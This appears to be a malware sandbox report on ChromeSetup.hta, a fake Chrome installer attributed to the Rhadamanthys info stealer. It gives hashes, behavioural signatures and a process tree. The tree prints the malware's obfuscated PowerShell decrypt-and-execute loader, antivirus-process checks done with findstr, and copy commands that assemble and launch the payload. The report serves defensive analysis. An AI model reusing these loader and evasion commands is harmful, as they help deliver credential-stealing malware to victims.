Analysis
- max time kernel: 1191s
- max time network: 1149s
- platform: windows11-21h2_x64
- resource: win11-20240221-en
- resource tags: arch:x64, arch:x86, image:win11-20240221-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 28-03-2024 03:03
- Static task: static1
- Behavioral task: behavioral1 (Sample: ChromeSetup.hta, Resource: win10-20240221-en)
- Behavioral task: behavioral2 (Sample: ChromeSetup.hta, Resource: win10v2004-20240319-en)
- Behavioral task: behavioral3 (Sample: ChromeSetup.hta, Resource: win11-20240221-en)
General
- Target: ChromeSetup.hta
- Size: 140KB
- MD5: d92c49ca712a0503de3e182f66e3dcba
- SHA1: 97f716142447128859561a75e4677f978aca7fad
- SHA256: 908ca27ec447937b2f97fd4053a8fea99f45bc7e2eb028152f2301c97f952acf
- SHA512: fdc26a2aa4f935286f77d04538bef4e7d0a3f99fec2a85544b5ab086ba1ab0fa758332f4aea26ea5f7e57f4bdb30854d64fd760e38d2bc2b31b414a97392b4e1
- SSDEEP: 768:p+/unhi1zOzZ+/unhi1zOzpBG3uJ1zxTg+/unhi1zOzxM+/unhi1zOz:pti5OzZti5OzpB91tgti5Ozati5Oz
Malware Config
Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++, first seen in August 2022.

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
Processes:
  description            pid   Process        procid_target
  PID 1064 created 2572  1064  Donations.pif  43
Blocklisted process makes network request (2 IoCs)
Processes:
  flow  pid   Process
  2     1572  powershell.exe
  3     1572  powershell.exe
Downloads MZ/PE file

Executes dropped EXE (2 IoCs)
Processes:
  pid   Process
  4220  ChromeSetup.exe
  1064  Donations.pif
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoCs)
Processes:
  pid   pid_target  Process       procid_target
  1860  1064        WerFault.exe  101
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  description        ioc                                                                   Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0       AcroRd32.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  AcroRd32.exe
Enumerates processes with tasklist (1 TTPs, 2 IoCs)
Processes:
  pid   Process
  4136  tasklist.exe
  1716  tasklist.exe

Modifies Internet Explorer settings
Processes:
  description  ioc                                                                                                                                        Process
  Key created  \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION  AcroRd32.exe
Modifies registry class (1 IoCs)
Processes:
  description  ioc                                                                             Process
  Key created  \REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings  powershell.exe

Runs ping.exe (1 TTPs, 1 IoCs)
Suspicious behavior: EnumeratesProcesses (34 IoCs)
Processes (consecutive identical rows collapsed; the last column gives the number of entries):
  pid   Process         entries
  1572  powershell.exe  2
  1064  Donations.pif   6
  3284  AcroRd32.exe    20
  1064  Donations.pif   2
  2804  dialer.exe      4
Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description              pid   Process
  Token: SeDebugPrivilege  1572  powershell.exe
  Token: SeDebugPrivilege  4136  tasklist.exe
  Token: SeDebugPrivilege  1716  tasklist.exe
Suspicious use of FindShellTrayWindow (4 IoCs)
Processes (identical rows collapsed; the last column gives the number of entries):
  pid   Process        entries
  3284  AcroRd32.exe   1
  1064  Donations.pif  3

Suspicious use of SendNotifyMessage (3 IoCs)
Processes (identical rows collapsed; the last column gives the number of entries):
  pid   Process        entries
  1064  Donations.pif  3

Suspicious use of SetWindowsHookEx (5 IoCs)
Processes (identical rows collapsed; the last column gives the number of entries):
  pid   Process       entries
  3284  AcroRd32.exe  5
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (identical rows collapsed; the last column gives the number of entries):
  description                       pid   Process          procid_target  entries
  PID 640 wrote to memory of 1572   640   mshta.exe        80             3
  PID 1572 wrote to memory of 3284  1572  powershell.exe   82             3
  PID 1572 wrote to memory of 4220  1572  powershell.exe   83             3
  PID 3284 wrote to memory of 2636  3284  AcroRd32.exe     84             3
  PID 4220 wrote to memory of 3948  4220  ChromeSetup.exe  85             3
  PID 2636 wrote to memory of 3416  2636  RdrCEF.exe       87             43
  PID 2636 wrote to memory of 1872  2636  RdrCEF.exe       88             6
Processes (children indented under their parent; the level is the depth in the process tree)

- sihost.exe (level 1, PID 2572)
  image: C:\Windows\system32\sihost.exe
  command: sihost.exe
  - dialer.exe (level 2, PID 2804)
    image: C:\Windows\SysWOW64\dialer.exe
    command: "C:\Windows\system32\dialer.exe"
    signatures: Suspicious behavior: EnumeratesProcesses

- mshta.exe (level 1, PID 640)
  image: C:\Windows\SysWOW64\mshta.exe
  command: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\ChromeSetup.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  signatures: Suspicious use of WriteProcessMemory
  - powershell.exe (level 2, PID 1572)
    image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function TLcToxJS($Imjw){return -split ($Imjw -replace '..', '0x$& ')};$eGLbfA = TLcTox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xBQDa = [System.Security.Cryptography.Aes]::Create();$xBQDa.Key = TLcToxJS('466371524D774563634159445A6A426E');$xBQDa.IV = New-Object byte[] 16;$PuTlXHvG = $xBQDa.CreateDecryptor();$BgiNlDJqW = $PuTlXHvG.TransformFinalBlock($eGLbfA, 0, $eGLbfA.Length);$HxMgCSafi = [System.Text.Encoding]::Utf8.GetString($BgiNlDJqW);$PuTlXHvG.Dispose();& $HxMgCSafi.Substring(0,3) $HxMgCSafi.Substring(3)
    signatures: Blocklisted process makes network request; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - AcroRd32.exe (level 3, PID 3284)
      image: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      command: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\sample.pdf"
      signatures: Checks processor information in registry; Modifies Internet Explorer settings; Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
      - RdrCEF.exe (level 4, PID 2636)
        image: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        command: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        signatures: Suspicious use of WriteProcessMemory
        - RdrCEF.exe (level 5, PID 3416)
          image: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          command: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=DB0107E573546FF35866715FBD4AE9D8 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=DB0107E573546FF35866715FBD4AE9D8 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1
        - RdrCEF.exe (level 5, PID 1872)
          image: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          command: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=ACD5BB1F196BA1375A0045A344C2F924 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        - RdrCEF.exe (level 5, PID 1640)
          image: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          command: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6ECDAD9A79189A7C02C294BDE5FCC11D --mojo-platform-channel-handle=2332 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        - RdrCEF.exe (level 5, PID 3136)
          image: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          command: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=3243B0154B8B4133AB9767C927801844 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=3243B0154B8B4133AB9767C927801844 --renderer-client-id=5 --mojo-platform-channel-handle=2032 --allow-no-sandbox-job /prefetch:1
        - RdrCEF.exe (level 5, PID 2248)
          image: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          command: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4AAF0F7B55F13C866EEA7E5F79D193F6 --mojo-platform-channel-handle=2708 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        - RdrCEF.exe (level 5, PID 2432)
          image: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          command: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BEF59DA98A3D6D6DD7E684BF11639301 --mojo-platform-channel-handle=2884 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
    - ChromeSetup.exe (level 3, PID 4220)
      image: C:\Users\Admin\AppData\Roaming\ChromeSetup.exe
      command: "C:\Users\Admin\AppData\Roaming\ChromeSetup.exe"
      signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
      - cmd.exe (level 4, PID 3948)
        image: C:\Windows\SysWOW64\cmd.exe
        command: "C:\Windows\System32\cmd.exe" /k move Bathrooms Bathrooms.bat & Bathrooms.bat & exit
        - tasklist.exe (level 5, PID 4136)
          image: C:\Windows\SysWOW64\tasklist.exe
          command: tasklist
          signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
        - findstr.exe (level 5, PID 8)
          image: C:\Windows\SysWOW64\findstr.exe
          command: findstr /I "wrsa.exe opssvc.exe"
        - tasklist.exe (level 5, PID 1716)
          image: C:\Windows\SysWOW64\tasklist.exe
          command: tasklist
          signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
        - findstr.exe (level 5, PID 1920)
          image: C:\Windows\SysWOW64\findstr.exe
          command: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        - cmd.exe (level 5, PID 728)
          image: C:\Windows\SysWOW64\cmd.exe
          command: cmd /c md 13137
        - cmd.exe (level 5, PID 1632)
          image: C:\Windows\SysWOW64\cmd.exe
          command: cmd /c copy /b Compound + Injection + Emotions + Worm + Participants 13137\Donations.pif
        - cmd.exe (level 5, PID 1248)
          image: C:\Windows\SysWOW64\cmd.exe
          command: cmd /c copy /b Src + Expressions + Safari + Treasury 13137\x
        - Donations.pif (level 5, PID 1064)
          image: C:\Users\Admin\AppData\Local\Temp\13137\Donations.pif
          command: 13137\Donations.pif 13137\x
          signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage
          - WerFault.exe (level 6, PID 1860)
            image: C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 984
            signatures: Program crash
        - PING.EXE (level 5, PID 4692)
          image: C:\Windows\SysWOW64\PING.EXE
          command: ping -n 5 127.0.0.1
          signatures: Runs ping.exe

- WerFault.exe (level 1, PID 4792)
  image: C:\Windows\SysWOW64\WerFault.exe
  command: C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1064 -ip 1064
Network
MITRE ATT&CK Enterprise v15
Downloads